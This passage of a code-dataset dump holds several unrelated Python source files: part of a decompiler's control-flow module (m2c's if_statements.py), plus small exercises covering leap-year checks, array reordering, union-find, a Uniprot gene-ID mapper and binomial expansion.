node.block.index > node.conditional_edge.block.index\n or context.options.target.compiler != Target.CompilerEnum.IDO\n ):\n if val in cases:\n return None\n cases[val] = node.fallthrough_edge\n node_queue.append((node.conditional_edge, bounds.without(val)))\n elif cond.op == \"<\":\n node_queue.append((node.fallthrough_edge, bounds.at_least(val)))\n node_queue.append((node.conditional_edge, bounds.at_most(val - 1)))\n elif cond.op == \">=\":\n node_queue.append((node.fallthrough_edge, bounds.at_most(val - 1)))\n node_queue.append((node.conditional_edge, bounds.at_least(val)))\n elif cond.op == \"<=\":\n node_queue.append((node.fallthrough_edge, bounds.at_least(val + 1)))\n node_queue.append((node.conditional_edge, bounds.at_most(val)))\n elif cond.op == \">\":\n node_queue.append((node.fallthrough_edge, bounds.at_most(val)))\n node_queue.append((node.conditional_edge, bounds.at_least(val + 1)))\n else:\n return None\n irregular_comparison_count += 1\n nodes_to_mark_emitted.add(node)\n continue\n\n elif isinstance(node, SwitchNode):\n # The switch must use the same control expression\n if block_info.switch_control is None:\n return None\n if early_unwrap_ints(block_info.switch_control.control_expr) != uw_var_expr:\n return None\n # Add the cases from the inner switch to our dict of cases\n for i, case in enumerate(\n node.cases, start=block_info.switch_control.offset\n ):\n if i in cases:\n return None\n cases[i] = case\n nodes_to_mark_emitted.add(node)\n irregular_comparison_count += 1\n continue\n\n values = bounds.values(max_count=1)\n if values and context.options.target.compiler != Target.CompilerEnum.IDO:\n # The bounds only have a few possible values, so add this node to the set of cases\n # IDO won't make implicit cases like this, however.\n for value in values:\n if value in cases:\n return None\n cases[value] = node\n nodes_to_mark_emitted.add(node)\n continue\n\n # If we've gotten here, then the node is not a valid jump target for the switch,\n # unless it could be the `default:`-labeled node.\n if default_node is not None:\n return None\n if isinstance(node, ReturnNode) or (\n start in node.dominators and end in 
node.postdominators\n    ):\n        default_node = node\n\n    # Need at least two irregular comparisons (to skip the regular ConditionalNode guard + SwitchNode pairs)\n    # Need to combine at least 3 nodes into 2 distinct cases, otherwise it could be a plain if/else with ||\n    if (\n        irregular_comparison_count < 2\n        or len(nodes_to_mark_emitted) < 3\n        or len(set(cases.values())) < 2\n    ):\n        return None\n\n    # If this new irregular switch uses all of the other switch nodes in the function,\n    # then we no longer need to add labelling comments with the switch_index\n    for n in nodes_to_mark_emitted:\n        context.switch_nodes.pop(n, None)\n    if context.switch_nodes:\n        switch_index = max(context.switch_nodes.values()) + 1\n    else:\n        switch_index = 0\n    context.switch_nodes[start] = switch_index\n\n    add_labels_for_switch(\n        context,\n        start,\n        var_expr.type,\n        cases=list(cases.items()),\n        default_node=default_node,\n    )\n\n    case_nodes = list(cases.values())\n    if default_node is not None:\n        case_nodes.append(default_node)\n    switch = build_switch_statement(\n        context,\n        SwitchControl.irregular_from_expr(var_expr),\n        case_nodes,\n        switch_index,\n        end,\n    )\n    context.emitted_nodes |= nodes_to_mark_emitted\n    return switch\n\n\ndef build_conditional_subgraph(\n    context: Context, start: ConditionalNode, end: Node\n) -> IfElseStatement:\n    \"\"\"\n    Output the subgraph between `start` and `end`, including the branch condition\n    in the ConditionalNode `start`.\n\n    This function detects \"plain\" if conditions, as well as conditions containing\n    nested && and || terms.\n\n    As generated by IDO and GCC, conditions with && and || terms are emitted in a\n    very particular way. There will be a \"chain\" of ConditionalNodes, where each node\n    falls through to the next node in the chain.\n    Each conditional edge from the nodes in this chain will go to one of:\n    - The head of the if block body (`if_node`)\n    - The head of the else block body (`else_node`)\n    - A *later* conditional node in the chain (no loops)\n\n    We know IDO likes to emit the assembly for basic blocks in the same order that\n    they appear in the C source. So, we generally call the fallthrough of the final\n    ConditionNode the `if_node` (unless it is empty). By construction, it will be\n    an earlier node than the `else_node`.\n    \"\"\"\n    # Find the longest fallthrough chain of ConditionalNodes.\n    # This is the starting point for finding the complex &&/|| Condition\n    # The conditional edges will be checked in a later step\n    curr_node: Node = start\n    chained_cond_nodes: List[ConditionalNode] = []\n    while True:\n        assert isinstance(curr_node, ConditionalNode)\n        chained_cond_nodes.append(curr_node)\n        curr_node = curr_node.fallthrough_edge\n        if not (\n            # If &&/|| detection is disabled, then limit the condition to one node\n            context.options.andor_detection\n            # Only include ConditionalNodes\n            and isinstance(curr_node, ConditionalNode)\n            # Only include nodes that are postdominated by `end`\n            and end in curr_node.postdominators\n            # Exclude the `end` node\n            and end is not curr_node\n            # Exclude any loop nodes (except `start`)\n            and not curr_node.loop\n            # Exclude nodes with incoming edges that are not part of the condition\n            and all(p in chained_cond_nodes for p in curr_node.parents)\n            # Exclude guards for SwitchNodes (they may be elided)\n            and not switch_guard_expr(curr_node)\n        ):\n            break\n\n    # We want to take the largest chain of ConditionalNodes that can be converted to\n    # a single condition with &&'s and ||'s. 
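(For instance, a three-node chain may collapse into a single `if (a && (b || c))`; the letters are placeholder conditions.) 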
We start with the largest chain computed\n    # above, and then trim it until it meets these criteria. The resulting chain will\n    # always have at least one node.\n    while True:\n        assert chained_cond_nodes\n        cond_result = try_make_if_condition(chained_cond_nodes, end)\n        if cond_result:\n            break\n        # Shorten the chain by removing the last node, then try again.\n        chained_cond_nodes.pop()\n    cond, if_node, else_node = cond_result\n\n    # Mark nodes that may have comma expressions in `cond` as emitted\n    context.emitted_nodes.update(chained_cond_nodes[1:])\n\n    # Build the if & else bodies\n    else_body: Optional[Body] = None\n    if else_node:\n        else_body = build_flowgraph_between(context, else_node, end)\n    if_body = build_flowgraph_between(context, if_node, end)\n\n    return IfElseStatement(cond, if_body, else_body)\n\n\ndef join_conditions(left: Condition, op: str, right: Condition) -> Condition:\n    assert op in [\"&&\", \"||\"]\n    return BinaryOp(left, op, right, type=Type.bool())\n\n\ndef emit_return(context: Context, node: ReturnNode, body: Body) -> None:\n    ret_info = get_block_info(node)\n\n    ret = ret_info.return_value\n    if ret is not None:\n        ret_str = format_expr(ret, context.fmt)\n        body.add_statement(SimpleStatement(f\"return {ret_str};\", is_jump=True))\n        context.is_void = False\n    else:\n        body.add_statement(SimpleStatement(\"return;\", is_jump=True))\n\n\ndef build_switch_statement(\n    context: Context,\n    jump: SwitchControl,\n    case_nodes: List[Node],\n    switch_index: int,\n    end: Node,\n) -> SwitchStatement:\n    \"\"\"\n    This is a helper function for building both regular & irregular switch bodies.\n    It returns a SwitchStatement with the body populated with the given set of nodes.\n    The nodes must already be labeled with `add_labels_for_switch` before calling this.\n    \"\"\"\n    switch_body = Body(print_node_comment=context.options.debug)\n\n    # If there are any case labels that jump to the `end` node immediately after the\n    # switch block, emit them as `case ...: break;` at the start of the switch block\n    # instead. 
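For example, a `case 3` (an illustrative label) whose target is the node right after the switch is emitted as `case 3: break;` at the top of the body. 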
This avoids having \"dangling\" `case ...:` labels outside of the block.\n    remaining_labels = []\n    for index, case_label in context.case_nodes[end]:\n        if index == switch_index:\n            comments = comments_for_switch(switch_index)\n            switch_body.add_statement(\n                SimpleStatement(f\"{case_label}:\", comments=comments, indent=-1)\n            )\n        else:\n            remaining_labels.append((index, case_label))\n    if len(remaining_labels) != len(context.case_nodes[end]):\n        switch_body.add_statement(SimpleStatement(\"break;\", is_jump=True))\n        context.case_nodes[end] = remaining_labels\n\n    # Order case blocks by their position in the asm, not by their order in the jump table\n    # (but use the order in the jump table to break ties)\n    sorted_cases = sorted(\n        set(case_nodes), key=lambda node: (node.block.index, case_nodes.index(node))\n    )\n    next_sorted_cases: List[Optional[Node]] = []\n    next_sorted_cases.extend(sorted_cases[1:])\n    next_sorted_cases.append(None)\n    for case, next_case in zip(sorted_cases, next_sorted_cases):\n        if case in context.emitted_nodes or case is end:\n            pass\n        elif (\n            next_case is not None\n            and next_case not in context.emitted_nodes\n            and next_case is not end\n            and next_case in case.postdominators\n        ):\n            switch_body.extend(build_flowgraph_between(context, case, next_case))\n            if not switch_body.ends_in_jump():\n                switch_body.add_comment(\"fallthrough\")\n        else:\n            switch_body.extend(build_flowgraph_between(context, case, end))\n            if not switch_body.ends_in_jump():\n                switch_body.add_statement(SimpleStatement(\"break;\", is_jump=True))\n    return SwitchStatement(jump, switch_body, switch_index)\n\n\ndef build_switch_between(\n    context: Context,\n    switch: SwitchNode,\n    default: Optional[Node],\n    end: Node,\n) -> SwitchStatement:\n    \"\"\"\n    Output the subgraph between `switch` and `end`, but not including `end`.\n    The returned SwitchStatement starts with the jump to the switch's value.\n    This is only used for single jump table switches, not irregular switches.\n    \"\"\"\n    switch_cases = switch.cases[:]\n    if default is end:\n        default = None\n    elif default is not None:\n        switch_cases.append(default)\n\n    jump = get_block_info(switch).switch_control\n    assert jump is not None\n\n    switch_index = add_labels_for_switch(\n        context,\n        switch,\n        jump.control_expr.type,\n        cases=list(enumerate(switch.cases, start=jump.offset)),\n        default_node=default,\n    )\n\n    return build_switch_statement(context, jump, switch_cases, switch_index, end)\n\n\ndef detect_loop(context: Context, start: Node, end: Node) -> Optional[DoWhileLoop]:\n    assert start.loop\n\n    # Find the condition for the do-while, if it exists\n    condition: Optional[Condition] = None\n    for node in start.loop.backedges:\n        if (\n            node in start.postdominators\n            and isinstance(node, ConditionalNode)\n            and node.fallthrough_edge == end\n        ):\n            block_info = get_block_info(node)\n            assert block_info.branch_condition is not None\n            condition = block_info.branch_condition\n            new_end = node\n            break\n    if not condition:\n        return None\n\n    loop_body = build_flowgraph_between(\n        context,\n        start,\n        new_end,\n        skip_loop_detection=True,\n    )\n    emit_node(context, new_end, loop_body)\n\n    return DoWhileLoop(loop_body, condition)\n\n\ndef build_flowgraph_between(\n    context: Context, start: Node, end: Node, skip_loop_detection: bool = False\n) -> Body:\n    \"\"\"\n    Output a section of a flow graph that has already been translated to our\n    symbolic AST. 
All nodes between start and end, including start but NOT end,\n    will be printed out using if-else statements and block info.\n\n    `skip_loop_detection` is used to prevent infinite recursion, since (in the\n    case of loops) this function can be recursively called by itself (via\n    `detect_loop`) with the same `start` argument.\n    \"\"\"\n    curr_start: Node = start\n    body = Body(print_node_comment=context.options.debug)\n\n    # We will split this graph into subgraphs, where the entrance and exit nodes\n    # of that subgraph are at the same indentation level. \"curr_start\" will\n    # iterate through these nodes by taking the immediate postdominators,\n    # which are commonly referred to as articulation nodes.\n    while curr_start != end:\n        assert not isinstance(curr_start, TerminalNode)\n\n        if (\n            not skip_loop_detection\n            and curr_start.loop\n            and curr_start not in context.emitted_nodes\n        ):\n            # Find the immediate postdominator to the whole loop,\n            # i.e. the first node outside the loop body\n            imm_pdom: Node = curr_start\n            while imm_pdom in curr_start.loop.nodes:\n                assert imm_pdom.immediate_postdominator is not None\n                imm_pdom = imm_pdom.immediate_postdominator\n\n            # Construct the do-while loop\n            do_while_loop = detect_loop(context, curr_start, imm_pdom)\n            if do_while_loop:\n                body.add_do_while_loop(do_while_loop)\n\n                # Move on.\n                curr_start = imm_pdom\n                continue\n\n        # If the current node has already been emitted and is equivalent to\n        # goto'ing the end node, we don't need to emit anything else. This\n        # avoids jumping to an empty node (or another jump) at the end of a\n        # block, like `{ block_N: break; ... goto block_N; }`\n        if curr_start in context.emitted_nodes and is_empty_goto(curr_start, end):\n            break\n\n        # Write the current node, or a goto, to the body\n        if not emit_node(context, curr_start, body):\n            # If the node was already written, emit_node will use a goto\n            # and return False. After the jump, control flow will\n            # continue from there (hopefully hitting `end`!)\n            break\n\n        if curr_start.emit_goto:\n            # If we have decided to emit a goto here, then we should just fall\n            # through to the next node by index, after writing a goto.\n            emit_goto(context, curr_start, body)\n\n            # Advance to the next node in block order. 
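(Concretely, the code below steps to `nodes[index + 1]` in the flow graph's node list.) 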
This may skip over\n # unreachable blocks -- hopefully none too important.\n index = context.flow_graph.nodes.index(curr_start)\n fallthrough = context.flow_graph.nodes[index + 1]\n if isinstance(curr_start, ConditionalNode):\n assert fallthrough == curr_start.fallthrough_edge\n curr_start = fallthrough\n continue\n\n # The interval to process is [curr_start, curr_start.immediate_postdominator)\n curr_end = curr_start.immediate_postdominator\n assert curr_end is not None\n\n # For nodes with branches, curr_end is not a direct successor of curr_start\n\n irregular_switch: Optional[SwitchStatement] = None\n if context.options.switch_detection:\n irregular_switch = try_build_irregular_switch(context, curr_start, curr_end)\n\n if irregular_switch is not None:\n body.add_switch(irregular_switch)\n elif switch_guard_expr(curr_start) is not None:\n # curr_start is a ConditionalNode that falls through to a SwitchNode,\n # where the condition checks that the switch's control expression is\n # within the jump table bounds.\n # We can combine the if+switch into just a single switch block.\n assert isinstance(\n curr_start, ConditionalNode\n ), \"checked by switch_guard_expr\"\n switch_node = curr_start.fallthrough_edge\n assert isinstance(switch_node, SwitchNode), \"checked by switch_guard_expr\"\n default_node = curr_start.conditional_edge\n # switch_guard_expr checked that switch_node has no statements to write,\n # so it is OK to mark it as emitted\n context.emitted_nodes.add(switch_node)\n if curr_end is switch_node:\n curr_end = switch_node.immediate_postdominator\n assert curr_end in curr_start.postdominators\n body.add_switch(\n build_switch_between(context, switch_node, default_node, curr_end)\n )\n elif isinstance(curr_start, SwitchNode):\n body.add_switch(build_switch_between(context, curr_start, None, curr_end))\n elif isinstance(curr_start, ConditionalNode):\n body.add_if_else(build_conditional_subgraph(context, curr_start, curr_end))\n elif (\n isinstance(curr_start, BasicNode) and curr_start.fake_successor == curr_end\n ):\n curr_end = curr_start.successor\n else:\n # No branch, but double check that we didn't skip any nodes.\n # If the check fails, then the immediate_postdominator computation was wrong\n assert curr_start.children() == [curr_end], (\n f\"While emitting flowgraph between {start.name()}:{end.name()}, \"\n f\"skipped nodes while stepping from {curr_start.name()} to {curr_end.name()}.\"\n )\n\n # Move on.\n curr_start = curr_end\n return body\n\n\ndef build_naive(context: Context, nodes: List[Node]) -> Body:\n \"\"\"Naive procedure for generating output with only gotos for control flow.\n\n Used for --gotos-only, when the regular if_statements code fails.\"\"\"\n\n body = Body(print_node_comment=context.options.debug)\n\n def emit_goto_or_early_return(node: Node, body: Body) -> None:\n if isinstance(node, ReturnNode) and not node.is_real():\n emit_node(context, node, body)\n else:\n emit_goto(context, node, body)\n\n def emit_successor(node: Node, cur_index: int) -> None:\n if (\n cur_index + 1 < len(nodes)\n and nodes[cur_index + 1] == node\n and not (isinstance(node, ReturnNode) and not node.is_real())\n ):\n # Fallthrough is fine\n return\n emit_goto_or_early_return(node, body)\n\n for i, node in enumerate(nodes):\n if isinstance(node, ReturnNode):\n # Do not emit duplicated (non-real) return nodes; they don't have\n # a well-defined position, so we emit them next to where they are\n # jumped to instead.\n if node.is_real():\n emit_node(context, node, body)\n elif 
isinstance(node, BasicNode):\n emit_node(context, node, body)\n emit_successor(node.successor, i)\n elif isinstance(node, SwitchNode):\n jump = get_block_info(node).switch_control\n assert jump is not None\n index = add_labels_for_switch(\n context,\n node,\n jump.control_expr.type,\n cases=list(enumerate(node.cases, start=jump.offset)),\n default_node=None,\n )\n emit_node(context, node, body)\n body.add_switch(\n SwitchStatement(\n jump=jump,\n body=Body(print_node_comment=False),\n index=index,\n )\n )\n elif isinstance(node, ConditionalNode):\n emit_node(context, node, body)\n if_body = Body(print_node_comment=True)\n emit_goto_or_early_return(node.conditional_edge, if_body)\n block_info = get_block_info(node)\n assert block_info.branch_condition is not None\n body.add_if_else(\n IfElseStatement(\n block_info.branch_condition,\n if_body=if_body,\n else_body=None,\n )\n )\n emit_successor(node.fallthrough_edge, i)\n else:\n assert isinstance(node, TerminalNode)\n\n return body\n\n\ndef build_body(context: Context, options: Options) -> Body:\n start_node: Node = context.flow_graph.entry_node()\n terminal_node: Node = context.flow_graph.terminal_node()\n is_reducible = context.flow_graph.is_reducible()\n\n if options.debug:\n print(\"Here's the whole function!\\n\")\n\n # Label switch nodes\n switch_nodes = [n for n in context.flow_graph.nodes if isinstance(n, SwitchNode)]\n if len(switch_nodes) == 1:\n # There is only one switch in this function (no need to label)\n context.switch_nodes[switch_nodes[0]] = 0\n else:\n for i, switch_node in enumerate(switch_nodes):\n context.switch_nodes[switch_node] = i + 1\n\n body: Body\n if options.ifs and is_reducible:\n body = build_flowgraph_between(context, start_node, terminal_node)\n body.elide_empty_returns()\n else:\n body = Body(print_node_comment=context.options.debug)\n if options.ifs and not is_reducible:\n body.add_comment(\n \"Flowgraph is not reducible, falling back to gotos-only mode.\"\n )\n body.extend(build_naive(context, context.flow_graph.nodes))\n\n # Check no nodes were skipped: build_flowgraph_between should hit every node in\n # well-formed (reducible) graphs; and build_naive explicitly emits every node\n for node in context.flow_graph.nodes:\n if node in context.emitted_nodes or isinstance(node, TerminalNode):\n continue\n if isinstance(node, ReturnNode) and not node.is_real():\n continue\n body.add_comment(\n f\"bug: did not emit code for node #{node.name()}; contents below:\"\n )\n emit_node(context, node, body)\n\n return body\n\n\ndef get_function_text(function_info: FunctionInfo, options: Options) -> str:\n fmt = options.formatter()\n context = Context(flow_graph=function_info.flow_graph, options=options, fmt=fmt)\n body: Body = build_body(context, options)\n\n function_lines: List[str] = []\n\n if function_info.symbol.demangled_str is not None:\n function_lines.append(\n fmt.with_comments(\"\", [function_info.symbol.demangled_str])\n )\n\n fn_name = function_info.stack_info.function.name\n arg_strs = []\n for i, arg in enumerate(function_info.stack_info.arguments):\n if i == 0 and function_info.stack_info.replace_first_arg is not None:\n original_name, original_type = function_info.stack_info.replace_first_arg\n arg_strs.append(original_type.to_decl(original_name, fmt))\n else:\n arg_strs.append(arg.type.to_decl(arg.format(fmt), fmt))\n if function_info.stack_info.is_variadic:\n arg_strs.append(\"...\")\n arg_str = \", \".join(arg_strs) or \"void\"\n\n fn_header = f\"{fn_name}({arg_str})\"\n\n if context.is_void:\n 
fn_header = f\"void {fn_header}\"\n    else:\n        fn_header = function_info.return_type.to_decl(fn_header, fmt)\n    whitespace = \"\\n\" if fmt.coding_style.newline_after_function else \" \"\n    function_lines.append(f\"{fn_header}{whitespace}{{\")\n\n    any_decl = False\n\n    with fmt.indented():\n        # Format the body first, because this can result in additional type inference\n        formatted_body = body.format(fmt)\n\n        local_vars = function_info.stack_info.local_vars\n        # GCC's stack is ordered low-to-high (e.g. `int sp10; int sp14;`)\n        # IDO's and MWCC's stack is ordered high-to-low (e.g. `int sp14; int sp10;`)\n        if options.target.compiler != Target.CompilerEnum.GCC:\n            local_vars = local_vars[::-1]\n        for local_var in local_vars:\n            type_decl = local_var.toplevel_decl(fmt)\n            if type_decl is not None:\n                comments = []\n                if local_var.value in function_info.stack_info.weak_stack_var_locations:\n                    comments = [\"compiler-managed\"]\n                function_lines.append(\n                    SimpleStatement(f\"{type_decl};\", comments=comments).format(fmt)\n                )\n                any_decl = True\n\n        temp_decls = []\n        for var in function_info.stack_info.temp_vars:\n            if var.is_emitted:\n                type_decl = var.type.to_decl(var.format(fmt), fmt)\n                temp_decls.append(f\"{type_decl};\")\n                any_decl = True\n        for decl in sorted(temp_decls):\n            function_lines.append(SimpleStatement(decl).format(fmt))\n\n        for phi_var in function_info.stack_info.naive_phi_vars:\n            type_decl = phi_var.type.to_decl(phi_var.get_var_name(), fmt)\n            function_lines.append(SimpleStatement(f\"{type_decl};\").format(fmt))\n            any_decl = True\n\n        # Create a variable to cast the original first argument to the assumed type\n        if function_info.stack_info.replace_first_arg is not None:\n            assert len(function_info.stack_info.arguments) >= 1\n            replaced_arg = function_info.stack_info.arguments[0]\n            original_name, original_type = function_info.stack_info.replace_first_arg\n\n            lhs = replaced_arg.type.to_decl(replaced_arg.format(fmt), fmt)\n            rhs = f\"({replaced_arg.type.format(fmt)}) {original_name}\"\n            function_lines.append(SimpleStatement(f\"{lhs} = {rhs};\").format(fmt))\n\n        if any_decl:\n            function_lines.append(\"\")\n\n    function_lines.append(formatted_body)\n    function_lines.append(\"}\")\n    full_function_text: str = \"\\n\".join(function_lines)\n    return full_function_text\n","repo_name":"doldecomp/melee","sub_path":"tools/m2c/m2c/if_statements.py","file_name":"if_statements.py","file_ext":"py","file_size_in_byte":60062,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"78"}
{"seq_id":"34406003132","text":"#Lab_Exercise_2\n#Q.3 Check whether the given year is a leap year or not. 
If the year is leap, print ‘LEAP YEAR’; else print ‘COMMON YEAR’.\n#Hint: • a year is a leap year if its number is exactly divisible by 4 and is not exactly divisible by 100\n#• a year is always a leap year if its number is exactly divisible by 400\n\ncurrentYear = int(input('Enter the year to check whether it is a leap year or not: '))\n\n\nif currentYear % 4 == 0:\n    if currentYear % 100 == 0:\n        if currentYear % 400 == 0:\n            result = \"LEAP YEAR\"\n        else:\n            result = \"COMMON YEAR\"\n    else:\n        result = \"LEAP YEAR\"\nelse:\n    result = \"COMMON YEAR\"\n\nprint(\"The year\", currentYear, \"is a\", result)","repo_name":"bishnusilwal/python-files","sub_path":"9.leap_year_or_not.py","file_name":"9.leap_year_or_not.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"5160107932","text":"\"\"\"\n@author: zwf\n@contact: zhengwenfeng37@gmail.com\n@time: 2023/6/23 15:08\n@desc:\n    https://leetcode.cn/problems/diao-zheng-shu-zu-shun-xu-shi-qi-shu-wei-yu-ou-shu-qian-mian-lcof/?envType=study-plan-v2&envId=coding-interviews\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def exchange3(self, nums: List[int]) -> List[int]:\n        \"\"\"\n        Create a new list; while iterating over nums, insert odd numbers at the left end and append even numbers at the right end.\n\n        This relies on Python list behavior: elements can be inserted at either end, and the list grows dynamically.\n\n        Time complexity: O(n)\n        Space complexity: O(n)\n        \"\"\"\n\n        ret = []\n\n        for num in nums:\n            if num % 2 == 0:\n                ret.append(num)\n            else:\n                ret.insert(0, num)\n\n        return ret\n\n    def exchange2(self, nums: List[int]) -> List[int]:\n        \"\"\"\n        Plain array operations, without relying on Python list features.\n\n        Create a new array and keep left/right indices for its two ends; while iterating, place odd numbers from the left (left + 1) and even numbers from the right (right - 1).\n\n        Time complexity: O(n)\n        Space complexity: O(n)\n        \"\"\"\n\n        n = len(nums)\n        left, right = 0, n - 1\n        ret_nums = [0] * n\n        for num in nums:\n            if num % 2 == 0:\n                ret_nums[right] = num\n                right -= 1\n            else:\n                ret_nums[left] = num\n                left += 1\n\n        return ret_nums\n\n    def exchange(self, nums: List[int]) -> List[int]:\n        \"\"\"\n        Swap in place instead of allocating a new array.\n\n        Time complexity: O(n)\n        Space complexity: O(1)\n\n        Two pointers, one at each end.\n        Scan from the left end:\n        if the left element is odd, it is already in the right place, so keep scanning;\n        if the left element is even, scan from the right end: skip even elements, and when an odd element is found, swap it with the left one.\n        \"\"\"\n        n = len(nums)\n        left, right = 0, n-1\n\n        while left < right:\n            while right > left and nums[left] % 2 == 1:\n                left += 1\n\n            while right > left and nums[right] % 2 == 0:\n                right -= 1\n\n            if right > left:\n                nums[left], nums[right] = nums[right], nums[left]\n                left += 1\n                right -= 1\n\n        return nums\n\n\nif __name__ == '__main__':\n    s = Solution()\n    ret = s.exchange([1, 2, 3, 4])\n    print(ret)\n","repo_name":"tenqaz/crazy_arithmetic","sub_path":"leetcode/剑指offer/剑指 Offer 21. 调整数组顺序使奇数位于偶数前面.py","file_name":"剑指 Offer 21. 
调整数组顺序使奇数位于偶数前面.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"4100062390","text":"#!/usr/bin/python -t\n\n# union find\n\nclass ConnectingGraph2:\n    \"\"\"\n    @param: n: An integer\n    \"\"\"\n    def __init__(self, n):\n        # do initialization if necessary\n        self.father = [0] * (1+n)\n        for i in range(1, n+1):\n            self.father[i] = i\n\n        self.size = [1] * (1+n)\n\n    def find(self, a):\n        #print self.father, a\n        if self.father[a] == a:\n            return a\n\n        return self.find(self.father[a])\n\n    \"\"\"\n    @param: a: An integer\n    @param: b: An integer\n    @return: nothing\n    \"\"\"\n    def connect(self, a, b):\n        # write your code here\n        #print a, b\n        roota = self.find(a)\n        #print roota\n        rootb = self.find(b)\n        #print roota, rootb\n        if roota == rootb:\n            return\n\n        self.father[roota] = rootb\n        self.size[rootb] = self.size[roota]+self.size[rootb]\n        #print self.father\n        #print self.size\n        return\n\n    \"\"\"\n    @param: a: An integer\n    @return: An integer\n    \"\"\"\n    def query(self, a):\n        # write your code here\n        return self.size[self.find(a)]\n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0590_connecting_graph_II.py","file_name":"0590_connecting_graph_II.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"33395822050","text":"#Module for retrieving a list of Uniprot IDs associated with a gene name; this functionality enables the retrieval \\\n#of EggNOG IDs for showing an EggNOG phylogenetic tree in the webapp\nimport requests\nfrom time import sleep\nimport simplejson as json\n\n#logfile to track any connection errors that may occur during runtime while connecting to Uniprot\nlogfile = open('idmapper_logfile.txt', 'a')\n#list containing all the plant species present in the Uniprot database\nfile = open('speclist.txt', 'r')\nspec_file = file.read().splitlines()\n# Loading the all plants file which contains all (by uniprot) known abbreviations for plants.\nspecies_file = open(\"all_plants.txt\")\nspecies_lines = species_file.read().splitlines()\n\n\n#Function for translating gene names to Uniprot IDs\ndef species_identifier(articles_doc):\n    #Defining the api URL\n    uni_url = 'http://www.uniprot.org/uploadlists/'\n    #Loading the gene file, should be replaced by JSON logic\n    articles_doc = json.loads(articles_doc)\n\n    #Loops over the list of genes and requests uniprot to translate the gene name to uniprot IDs\n    for a, article in enumerate(articles_doc):\n        print(a)\n        genes = [x['name'] for x in article['genes']]\n        for n, gene in enumerate(genes):\n            attempt = 0\n            go = True\n            while go:\n                try:\n                    counter = n\n                    #Defining parameters for the uniprot api\n                    payload = {\n                        'from': 'GENENAME',\n                        'to': 'ID',\n                        'format': 'list',\n                        'query': gene\n                    }\n                    uniprot_id_request = requests.get(uni_url, params=payload)\n                    text1 = uniprot_id_request.text\n                    textsplit = text1.split()\n                    #check is used to check if a result needs to be saved or not.\n\n                    #Loops over the list of uniprot IDs and checks if each one is in the list of plants\n                    #if it is in the list of plants it will request uniprot to translate the uniprot id to an EggNOG id and save this result.\n                    #It will only save the first result which is a plant and has an EggNOG id.\n\n                    if textsplit is not None or len(textsplit) != 0:\n                        uniprot_ids = []\n                        for x in textsplit:\n                            #second part of the Uniprot ID contains a species mnemonic (often an abbreviation)\n                            species = x.split(\"_\")[1]\n                            
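#e.g. an entry name like \"XXXX_ARATH\" (a made-up example) yields the mnemonic \"ARATH\", Uniprot's code for Arabidopsis thaliana\n                            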
#Checks if it is a plant by comparing with the all_plants.txt species list\n                            if species in species_lines:\n                                uniprot_ids.append(x)\n                        update_json_record(uniprot_ids, gene, species, article)\n\n                    go = False\n                except requests.ConnectionError:\n                    go = True\n                    attempt += 1\n                except requests.ConnectTimeout:\n                    go = True\n                    attempt += 1\n                except requests.HTTPError:\n                    go = True\n                    attempt += 1\n                finally:\n                    if attempt > 2:\n                        sleep(3)\n                    if attempt > 3:\n                        logfile.write('ERROR for ' + gene + \" in: \" + article['pmid'] + '\\n')\n                        go = False\n    logfile.close()\n    return articles_doc\n\n#Function for updating the json record with the full information from the articles\ndef update_json_record(uniprot_ids, gene, species, article):\n\n    #Fetch the binomial name for the mnemonic\n    binominal = fetch_full_species(species)\n\n    #gene document compatible with json format with substructures for orthologs and Uniprot IDs\n    gene_doc = {'name': gene, 'orthologs':{}, 'uniprot_ids': uniprot_ids}\n    species = article['species']\n    all_species = [x['name'] for x in species]\n    # Checks if the species name is already present in the json record for a certain article\n    if binominal in all_species:\n        for n, spec in enumerate(species):\n            if species[n]['name'] == binominal:\n                species_doc = species[n]\n    #Else: create a new record for the species name with a substructure for genes\n    else:\n        species_doc = {'name': binominal, 'genes': []}\n        species.append(species_doc)\n    genes = species_doc['genes']\n    all_genes = [x['name'] for x in genes]\n    #If the gene is not already present in the articles_doc json for this particular species, append to the doc\n    if gene not in all_genes:\n        genes.append(gene_doc)\n\n\n#Function for retrieving the full (binomial) name for a Uniprot mnemonic by scanning speclist.txt\ndef fetch_full_species(species):\n\n    #the binomial name is on the same line as the mnemonic, after \"N=\"\n    for line in spec_file:\n        if species in line and \"N=\" in line:\n            return line.split(\"N=\")[1].strip()\n    #if the full species name is not present in the file, fall back to the mnemonic itself\n    return species\n","repo_name":"heleensev/TextGraver","sub_path":"Textminer/textgraver/id_mapper.py","file_name":"id_mapper.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"42122241361","text":"import string\nimport math\n\ndef str_to_numb(str):\n    if not str:\n        return 1\n    is_negative = False\n    if '-' in str:\n        is_negative = True\n        str = str.strip('-')\n        if not str:\n            return -1\n    return int(str) * (-1) if is_negative else int(str)\n\ndef expand(expr):\n    paranthesis, power = expr.split('^')\n    n = int(power)\n    if n == 0:\n        return \"1\"\n    equation = paranthesis.strip('(').strip(')')\n    if n == 1:\n        return equation\n    for indx, char in enumerate(equation):\n        if char in string.ascii_lowercase:\n            equation = equation.split(char)\n            equation.append(char)\n            break\n\n    a = str_to_numb(equation[0])\n    b = str_to_numb(equation[1])\n    return_eq = []\n    for k in reversed(range(n + 1)):\n        fact = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n        variable = (equation[2] if k > 0 else '') + ('^' + str(k) if k > 1 else '')\n        adj = int(fact * a**k * b**(n-k))\n        str_adj = ''\n        if adj != 1:\n            str_adj = str(adj) if adj != -1 else str(adj).strip('1')\n        elif k == 0:\n            str_adj = str(adj)\n\n        return_eq.append(str_adj + variable)\n    return '+'.join(return_eq).replace(\"+-\", 
